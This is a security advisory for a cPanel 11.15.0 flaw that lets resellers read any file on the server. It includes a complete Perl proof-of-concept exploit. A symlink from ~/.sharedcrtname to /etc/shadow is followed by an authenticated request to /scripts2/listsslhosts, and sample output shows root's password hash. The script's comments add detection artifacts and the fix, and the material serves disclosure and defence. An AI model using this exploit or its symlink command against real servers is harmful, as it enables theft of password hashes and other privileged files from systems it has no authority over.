cPanel 11.15.0-RELEASE_17853 - Resellers could view any file on the box



DESCRIPTION


Resellers could symlink ~/.sharedcrtname to any file on the box, then view the contents of that file via "Manage SSL Hosts" in WHM. Even if that option was not made available to the reseller in WHM, the reseller could still send the underlying request directly to the server, and it would be honored.


Step 1:

[user@host ~]$ ln -s /etc/shadow /home/reseller_username/.sharedcrtname


Step 2:

GET /scripts2/listsslhosts HTTP/1.0



IMPACT


Resellers could view any file on the box.


[user@host ~]$ ./11.15.0-RELEASE_17853-view_any_file.pl
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::
bin:*:14322:0:99999:7:::
daemon:*:14322:0:99999:7:::
adm:*:14322:0:99999:7:::
lp:*:14322:0:99999:7:::
sync:*:14322:0:99999:7:::
shutdown:*:14322:0:99999:7:::
halt:*:14322:0:99999:7:::
mail:*:14322:0:99999:7:::
news:*:14322:0:99999:7:::
...


#!/usr/bin/perl

#########################################################
#
# 11.15.0-RELEASE_17853
#
# View the entire contents of a file, such as /etc/shadow
# Works via /home/user/.sharedcrtname
#
# Proof of concept for the advisory above. Everything the
# script does is visible below: it plants a symlink at
# ~/.sharedcrtname, sends one authenticated request to the
# local WHM port and prints the response lines that look
# like shadow entries. Both steps leave artifacts that a
# defender can key detection on: the symlink in a reseller's
# home directory, and the GET /scripts2/listsslhosts request
# on port 2086. The server-side fix is for the endpoint not
# to follow a symlink planted by the reseller, or not to read
# the file with privileges beyond the reseller's own.
#
#########################################################

use strict;
use warnings;
use MIME::Base64;
use IO::Socket::INET;

# Reseller credentials used for HTTP Basic auth; left blank in the
# published PoC.
my $username = '';
my $password = '';

# "user:pass" base64-encoded for the Authorization header.
my $creds = encode_base64("$username:$password");

# The file the endpoint reads lives in the reseller's own home
# directory, so the reseller controls what it points at.
my $sharedcrtname    = "/home/$ENV{'USER'}/.sharedcrtname";
my $sharedcrtnamebak = $sharedcrtname . 'bak';
my $etcshadow        = '/etc/shadow';

# Preserve any real .sharedcrtname so it can be put back at the end.
if ( -e $sharedcrtname ) {
    rename $sharedcrtname, $sharedcrtnamebak;
}

# Replace it with a symlink to the target file. This symlink is the
# on-disk artifact of the attack.
symlink $etcshadow, $sharedcrtname;

# A raw HTTP/1.0 request to the WHM endpoint, authenticated as the
# reseller.
my $request = "GET /scripts2/listsslhosts HTTP/1.0\r\n";
$request   .= "Authorization: Basic $creds\r\n\r\n";

# Connect to WHM on the local host (port 2086, plain HTTP).
my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2086',
    Proto    => 'tcp',
    Timeout  => '3',
) or die "Unable to connect to localhost on port 2086\n";

# Send the request and take a single read of up to 100 000 bytes of
# the response.
print $sock $request;
read $sock, my $buffer, 100_000;
close $sock;

# As the advisory describes, the response carries the symlink
# target's contents inside HTML. Keep only lines that look like
# shadow(5) entries (the trailing ":::" fields) and strip the
# markup that precedes each one.
my @buffer = split ( /\n/, $buffer );
for my $line ( @buffer )
{
    if ( $line =~ /:::/ )
    {
        $line =~ s/.*<b>//g;
        print "$line\n";
    }
}

# Restore the original .sharedcrtname, if there was one.
if ( -e $sharedcrtnamebak ) {
    rename $sharedcrtnamebak, $sharedcrtname;
}